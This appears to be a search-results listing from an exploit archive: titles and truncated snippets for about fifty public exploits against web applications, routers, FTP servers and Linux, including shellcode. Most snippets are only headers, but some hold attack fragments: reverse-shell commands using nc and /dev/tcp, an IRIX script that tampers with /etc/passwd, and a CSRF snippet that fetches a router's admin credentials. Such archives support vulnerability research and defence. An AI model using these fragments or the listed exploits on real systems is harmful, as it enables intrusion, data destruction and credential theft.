39001 matches found
ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution Exploit
Exploit for multiple platform in category web applications https://twitter.com/gscamelo Vendor Homepage: https://smartbear.com/product/ready-api Software Link: https://smartbear.com/product/ready-api/overview/ Github: https://github.com/gscamelo/CVE-2018-20580 Version: 2.5.0 and 2.6.0 Tested on:...
LG Supersign EZ CMS - Remote Code Execution Exploit
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'LG Supersign EZ CMS RCE', 'Description' = %q LG SuperSignEZ CMS, that many LG SuperSign TVs have builtin, is prone to remote code execution due to...
iOS 12.1.3 - cfprefsd Memory Corruption Exploit
// c 2019 ZecOps, Inc. - https://www.zecops.com - Find Attackers' Mistakes // Intended only for educational and defensive purposes only. // Use at your own risk. // iOS 12.1.3 - cfprefsd Memory Corruption Exploit include import include include include include include define AGENT 1 define...
PHPads 2.0 - (click.php3?bannerID) SQL Injection Vulnerability
Exploit for php platform in category web applications + Sql Injection on PHPads Version 2.0 based on Pixelledads 1.0 by Nile Flores + Risk: High + CWE Number : CWE-89 + Author: Felipe Andrian Peixoto + Vendor Homepage: https://blondish.net/ + Software Demo :...
microASP (Portal+) CMS - (pagina.phtml?explode_tree) SQL Injection Vulnerability
Exploit for asp platform in category web applications + Sql Injection on microASP Portal+ CMS + Risk: High + CWE Number : CWE-89 + Author: Felipe Andrian Peixoto + Vendor Homepage: http://www.microasp.it/ + Contact: email protected + Tested on: Windows 7 and Gnu/Linux + Dork:...
Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)
Title: Linux/x86 - Multiple keys XOR Encoder / Decoder execve/bin/sh Shellcode 59 bytes Author: Xavi Beltran Date: 05/05/2019 Contact: email protected Purpose: spawn /bin/sh shell Tested On: Ubuntu 3.5.0-17-generic Arch: x86 Size: 59 bytes sh.nasm global start section .text start: xor eax, eax pu...
Linux/x86 - shred file Shellcode (72 bytes)
Exploit Title: Linux/x86 shred file 72 bytes Google Dork: None Exploit Author: strider Vendor Homepage: None Software Link: None Tested on: Debian 9 Stretch i386/ Kali Linux i386 CVE : None Shellcode Length: 72 ------------------------------Description--------------------------------- This...
Wordpress Social Warfare Plugin 3.5.3 - Remote Code Execution Exploit
Title: RCE in Social Warfare Plugin Wordpress =3D3.5.2 Researcher: Luka Sikic Exploit Author: hash3liZer Download Link: https://wordpress.org/plugins/social-warfare/ Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=3DIwAR2xLSnan=ccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM Github...
Blue Angel Software Suite - Command Execution Exploit
Exploit Title: Blue Angel Software Suite - Authenticated Command Execution Exploit Author: Paolo Serracino Vendor Homepage: http://www.5vtechnologies.com Software Link: N/A Version: All Tested on: Embedded Linux OS CVE : N/A Description: Blue Angel Software Suite, an application that runs on...
MailCarrier 2.51 HELP Remote Buffer Overflow Exploit
!/usr/bin/python Exploit Title: MailCarrier 2.51 - Remote Buffer Overflow in "HELP" commandSMTP Exploit Author: Vinaykumar Yennam and Dheepshika Raghunathan Vendor Homepage: https://www.tabslab.com/ Version: 2.51 Software Link: N.A Tested on: Windows XP Prof SP3 ENG x86 CVE: TBC from Mitre Create...
Barco / AWIND OEM Presentation Platform Unauthenticated Remote Command Injection Vulnerability
Exploit for hardware platform in category web applications Exploit Title: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection Exploit Author: Jacob Baines Tested on: Crestron AM-100 1.6.0.2 CVE : CVE-2019-3929 PoC Video: https://www.youtube.com/watch?v=q-PIjnPcu2k...
Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper
Exploit Title: Linux/x86 - Reverse Shell Shellcode 91 Bytes + Python Wrapper Exploit Author: Dave Sully Vendor Homepage: Software Link: NA Version: NA Tested on: Ubuntu 16.04 CVE : NA This is the raw assembly ; Filename: reverseshell.nasm ; Author: Dave Sully ; Website: http://suls.co.uk ; Purpos...
Zotonic < 0.47.0 mod_admin - Cross-Site Scripting Vulnerability
Exploit for multiple platform in category web applications Exploit Title: Zotonic prompt‘XSS’ Affected source code file zotonicmodadmin: - zotonicmodadminidentity\priv\templates\adminsortheader.tpl - zotonicmodadminidentity\priv\templates\adminusers.tpl References...
SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service Exploit
Vendor: Solarwinds Site Vendor: https://www.dameware.com/ Product: Dameware Mini Remote Control Version: 10.0 x64 Platform: Windows Tested on: Windows 7 SP1 x64 Dscription: The DWRCC executable file is affected by a buffer overflow vulnerability. The buffer size passed in on the machine name...
Instagram Auto Follow - Authentication #Bypass Vulnerability
Exploit for php platform in category web applications Exploit Title: Instagram Auto Follow - Autobot Instagram - Authentication Bypass Exploit Author: Veyselxan Vendor Homepage: https://codecanyon.net/item/instagram-auto-follow-autobot-instagram/23720743?srank=4 Tested on: Linux...
phpBB 3.2.5 Denial Of Service Vulnerability
Vulnerability information ========================= Title: phpBB Native Fulltext Search denial of service CVE ID: CVE-2019-9826 CVSSv3 score: 8.6 AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H Vulnerability description ========================= Improper input validation in the Native Fulltext Search compone...
Linux/x86 openssl aes256cbc encrypt files small like ransomware (185 bytes)
Exploit Title: Linux/x86 openssl aes256cbc encrypt files small like ransomware 185 bytes Exploit Author: strider Vendor Homepage: None Software Link: None Tested on: Debian 9 Stretch i386/ Kali Linux i386 CVE : None Shellcode Length: 185...
Windows PowerShell ISE / Filename Parsing Flaw Remote Code Execution Exploit
Microsoft Windows PowerShell ISE will execute wrongly supplied code when debugging specially crafted PowerShell scripts that contain array brackets as part of the filename. This can result in ISE executing attacker supplied scripts pointed to by the filename and not the "trusted" PS file currentl...
Ruby On Rails DoubleTap Development Mode secret_key_base Remote Code Execution Exploit
This Metasploit module exploits a vulnerability in Ruby on Rails. In development mode, a Rails application would use its name as the secretkeybase, and can be easily extracted by visiting an invalid resource for a path. As a result, this allows a remote user to create and deliver a signed...
Moodle 3.6.3 - Install Plugin Remote Command Execution Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Moodle 3.6.3 - 'Install Plugin' Remote Command Execution", 'Description' = %q This module exploits a command execution vulnerability in Moodle...
SpotAuditor 5.2.6 - Name Denial of Service Exploit
Exploit Title: SpotAuditor 5.2.6 - 'Name' Denial of Service PoC Discovery by: Victor Mondragón Vendor Homepage: www.nsauditor.com Software Link: http://spotauditor.nsauditor.com/downloads/spotauditorsetup.exe Tested Version: 5.2.6 Tested on: Windows Windows 10 Single Language x64 / 7 x64 Service...
Netgear DGN2200 / DGND3700 - Admin Password Disclosure Vulnerability
Exploit for hardware platform in category web applications /bin/bash PoC based on CVE-2016-5649 created by Social Engineering Neo. Long Method: https://www.youtube.com/watch?v=f3awG0XPKAs https://www.shodan.io/search?query=DGN2200 = 2,325 possible vulnerable devices...
Domoticz 4.10577 - Unauthenticated Remote Command Execution Exploit
Exploit for multiple platform in category web applications !/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse...
Intelbras IWR 3000N 1.5.0 - Cross-Site Request Forgery Vulnerability
Exploit for hardware platform in category web applications IWR 3000N - CSRF on authenticated administrator Exploit! Click the button to get the login and password. function exploit $.get "http://localhost:80/v1/system/user" .done data = alert data ; .failfunction err, status alert status ; ;...
HumHub 1.3.12 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: HumHub 1.3.12 - Cross-Site Scripting Exploit Author: Kağan EĞLENCE Vendor Homepage: https://humhub.org/ Version: 1.3.12 CVE : CVE-2019-11564 Url :...
Oracle #Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution Exploit #RCE
Exploit for windows platform in category web applications !/usr/bin/python Exploit Title: Oracle Weblogic Exploit CVE-2019-2725 Date: 30/04/2019 Exploit Author: Avinash Kumar Thapa Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html Software Link:...
Spring Cloud Config 2.1.x - Path Traversal Exploit
Exploit for java platform in category web applications This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Spring Cloud Config Server Directory Traversal', 'Description' = %q This module exploits a...
Veeam ONE Reporter 9.5.0.3201 - Multiple Cross-Site Request Forgery Vulnerabilities
Exploit for multiple platform in category web applications Exploit Title: Veeam ONE Reporter - Cross-Site Request Forgery All Actions/Methods Exploit Author: Seyed Sadegh Khatami Website: https://www.cert.ir Vendor Homepage: https://www.veeam.com/ Software Link:...
Freefloat FTP Server 1.0 - STOR Remote Buffer Overflow Exploit
Exploit Title: Free Float FTP 1.0 "STOR" Remote Buffer Overflow Exploit Author: Kevin Randall Vendor Homepage: Software Link: http://www.freefloat.com/software/freefloatftpserver.zip Version: Firmware: Free Float FTP 1.0 Tested on: Windows XP Professional Service Pack 2 CVE : N/A Generate Shellco...
DeviceViewer 3.12.0.1 - user SEH Overflow Exploit
Exploit for windows platform in category local exploits Exploit Title: DeviceViewer v3.12.0.1 username field SEH overflow PoC Exploit Author: Hayden Wright Vendor Homepage: www.sricam.com/ Software Link: http://download.sricam.com/Manual/DeviceViewer.exe Version: v3.12.0.1 Tested on: Windows XP P...
Intelbras IWR 3000N - Denial of Service (Remote Reboot) Vulnerability
Exploit for hardware platform in category web applications /bin/bash PoC based on CVE-2019-11415 created by Social Engineering Neo. Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-any-version-dos-on-malformed-login-request/ A malformed login request allows remote attackers to cause a...
Freefloat FTP Server 1.0 - SIZE Remote Buffer Overflow Exploit
Exploit Title: Free Float FTP 1.0 "SIZE" Remote Buffer Overflow Exploit Author: Kevin Randall Vendor Homepage: Software Link: http://www.freefloat.com/software/freefloatftpserver.zip Version: Firmware: Free Float FTP 1.0 Tested on: Windows XP Professional Service Pack 2 CVE : N/A Generate Shellco...
Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting Vulnerability
Exploit for multiple platform in category web applications Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting Stored XSS Exploit Author: Seyed Sadegh Khatami Website: https://www.cert.ir Vendor Homepage: https://www.veeam.com/ Software Link:...
Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit Widget) Vulnerability
Exploit for multiple platform in category web applications Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting Add/Edit Widget Exploit Author: Seyed Sadegh Khatami Website: https://www.cert.ir Vendor Homepage: https://www.veeam.com/ Software Link:...
Hyvikk Fleet Manager - Shell Upload Vulnerability
Exploit for php platform in category web applications ======================================================================================== | Fleet Manager hyvikk Shell Upload | Title : Fleet Manager by hyvikk All versions | Author : saxgy1331 - Kaieteur-Falls-1331 | Vendor Homepage:...
Yum Package Manager Persistence Exploit
This Metasploit module will run a payload when the package manager is used. No handler is run automatically so you must configure an appropriate exploit/multi/handler to connect. Module modifies a yum plugin to launch a binary of choice. grep -F 'enabled=1' /etc/yum/pluginconf.d/ will show what...
Apache Archiva 2.2.3 Cross Site Scripting / File Write / Delete Vulnerabilities
Exploit for multiple platform in category web applications CVE-2019-0213: Apache Archiva Stored XSS Severity: Low Vendor: The Apache Software Foundation Versions Affected: Apache Archiva 2.0.0 - 2.2.3 The unsupported versions 1.x are also affected. It may be possible to store malicious XSS code...
AIS Logistics ESEL-Server SQL Injection / Code Execution Exploit
This Metasploit module will execute an arbitrary payload on an "ESEL" server used by the AIS logistic software. The server typically listens on port 5099 without TLS. There could also be server listening on 5100 with TLS but the port 5099 is usually always open. The login process is vulnerable to...
APT Package Manager Persistence Exploit
This Metasploit module creates a pre-invoke hook for APT in apt.conf.d. The hook name syntax is numeric followed by text. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'APT Package Manager...
Sierra Wireless AirLink ES450 ACEManager template_load.cgi Information Disclosure Exploit
An exploitable information disclosure vulnerability exists in the ACEManager templateload.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause a information leak, resulting in the disclosure of internal paths and files. An attacker can make an...
Pimcore < 5.71 Unserialize Remote Code Execution Exploit
This Metasploit module exploits a PHP unserialize in Pimcore before 5.7.1 to execute arbitrary code. An authenticated user with "classes" permission could exploit the vulnerability. The vulnerability exists in the "ClassController.php" class, where the "bulk-commit" method makes it possible to...
Agent Tesla Botnet Information Disclosure Vulnerability
Agent Tesla Botnet suffers from an information leakage vulnerability. Exploit Title: Agent Tesla Botnet - Information Disclosure Disclosure Vulnerability Exploit Author: n4pst3r Vendor Homepage: unkn0wn Software Link: http://www.agenttesla.com/ ¡ Down ! Version: unkn0wn Tested on: Windows 10,...
Sierra Wireless AirLink ES450 ACEManager Embedded_Ace_Get_Task.cgi Information Disclosure Exploit
An exploitable Information Disclosure vulnerability exists in the ACEManager EmbeddedAceGetTask.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause an information disclosure, resulting in the exposure of confidential information, including, but...
Joomla JiFile 2.3.1 Arbitrary File Download Vulnerability
Exploit for php platform in category web applications Exploit Title: Joomla! Component JiFile 2.3.1 - Arbitrary File Download Exploit Author: Mr Winst0n Author E-mail: email protected Vendor Homepage: http://www.isapp.it Software Link :...
Sierra Wireless AirLink ES450 ACEManager Information Disclosure Exploit
An exploitable information disclosure vulnerability exists in the ACEManager functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A HTTP request can result in disclosure of the default configuration for the device. An attacker can send an unauthenticated HTTP request to trigger this...
Linux Missing Lockdown Exploit
Linux suffers from a missing locking between ELF coredump code and userfaultfd VMA modification. Linux: missing locking between ELF coredump code and userfaultfd VMA modification Related CVE Numbers: CVE-2019-11599. elfcoredump has a comment back from something like 2.5.43-C3 that says: / We no...
Sierra Wireless AirLink ES450 ACEManager iplogging.cgi Command Injection Exploit
An exploitable command injection vulnerability exists in the ACEManager iplogging.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can inject arbitrary commands, resulting in arbitrary command execution. An attacker can send an authenticated HTTP reque...
SGI IRIX <= 6.4.x Run-Time Linker Arbitrary File Creation Exploit
SGI IRIX versions 6.4.x and below run-time linker rld arbitrary file creation exploit. !/bin/sh SGI IRIX /etc/passwd" /tmp/.x.sh chmod 755 /tmp/.x.sh RLDARGS="-log /.cshrc |/tmp/.x.sh" /sbin/su last -3 root echo " waiting 5mins for root to login..." sleep 300 su - w00t 0day.today 2019-04-30...
SGI IRIX <= 6.5.5 syssgi() Onyx kernel memory disclosure Exploit
Exploit for irix platform in category local exploits / SGI IRIX include include include include include define bufsize 4294967295 int mainint argc,char argv int fd; ssizet out; char outputbuffer; ifargc \n"; exit1; printf" IRIX 6.5.5 syssgi Onyx IP19/IP21/IP25 kernel memory information leak\n";...
Sierra Wireless AirLink ES450 ACEManager Embedded_Ace_Set_Task.cgi Permission Assignment Exploit
An exploitable Permission Assignment vulnerability exists in the ACEManager EmbeddedAceSetTask.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause a arbitrary setting writes, resulting in the unverified changes to any system setting. An attacker...